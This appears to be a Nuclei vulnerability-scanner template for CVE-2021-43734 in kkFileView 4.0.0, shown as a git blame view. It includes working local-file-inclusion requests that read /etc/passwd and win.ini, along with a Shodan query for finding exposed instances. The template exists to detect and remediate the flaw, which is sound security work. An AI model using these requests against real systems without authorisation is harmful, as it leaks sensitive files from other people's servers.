2022-08-18 11:29:11 +00:00
|
|
|
id: CVE-2021-43734
|
|
|
|
|
|
|
|
info:
|
2023-01-16 17:41:15 +00:00
|
|
|
name: kkFileview v4.0.0 - Local File Inclusion
|
2022-08-18 11:29:11 +00:00
|
|
|
author: arafatansari
|
2022-08-18 11:39:16 +00:00
|
|
|
severity: high
|
2022-08-21 08:47:30 +00:00
|
|
|
description: |
|
2023-01-16 17:41:15 +00:00
|
|
|
kkFileview v4.0.0 is vulnerable to local file inclusion which may lead to a sensitive file leak on a related host.
|
2023-09-06 12:09:01 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade to a patched version of kkFileview v4.0.1 or later, or apply the necessary security patches provided by the vendor.
|
2022-08-18 11:29:11 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/kekingcn/kkFileView/issues/304
|
2022-08-19 09:29:29 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-43734
|
2022-08-19 09:34:57 +00:00
|
|
|
classification:
|
2022-08-21 08:47:30 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
2022-08-19 09:34:57 +00:00
|
|
|
cve-id: CVE-2021-43734
|
2022-08-21 08:47:30 +00:00
|
|
|
cwe-id: CWE-22
|
2023-10-14 11:27:55 +00:00
|
|
|
epss-score: 0.03024
|
2023-10-22 12:16:24 +00:00
|
|
|
epss-percentile: 0.89819
|
2023-09-06 12:09:01 +00:00
|
|
|
cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:*
|
2022-08-18 11:29:11 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 12:09:01 +00:00
|
|
|
max-request: 2
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: keking
|
|
|
|
product: kkfileview
|
2023-09-06 12:09:01 +00:00
|
|
|
shodan-query: http.html:"kkFileView"
|
2022-12-15 20:50:22 +00:00
|
|
|
tags: cve,cve2021,kkfileview,traversal,lfi
|
2022-08-18 11:29:11 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-08-18 11:29:11 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2022-08-19 09:14:27 +00:00
|
|
|
- "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd"
|
2022-12-15 20:42:07 +00:00
|
|
|
- "{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"
|
2022-08-18 11:29:11 +00:00
|
|
|
|
2022-12-15 20:42:07 +00:00
|
|
|
stop-at-first-match: true
|
2023-07-11 19:49:27 +00:00
|
|
|
|
2022-08-18 11:29:11 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-12-15 20:42:07 +00:00
|
|
|
- "root:.*:0:0:"
|
|
|
|
- "for 16-bit app support"
|
|
|
|
condition: or
|
2022-08-18 11:29:11 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-23 07:14:07 +00:00
|
|
|
|
|
|
|
# digest: 4a0a00473045022100a4f9d70a9bc12e89f67d447f68aceaccf6b068d7200dc6bb005508469f9e2c1e0220673ffc17c564f2b927bc5c49004a2d6799ace28bb2a8336b35caefe5205616b5:922c64590222798bb761d5b6d8e72950
|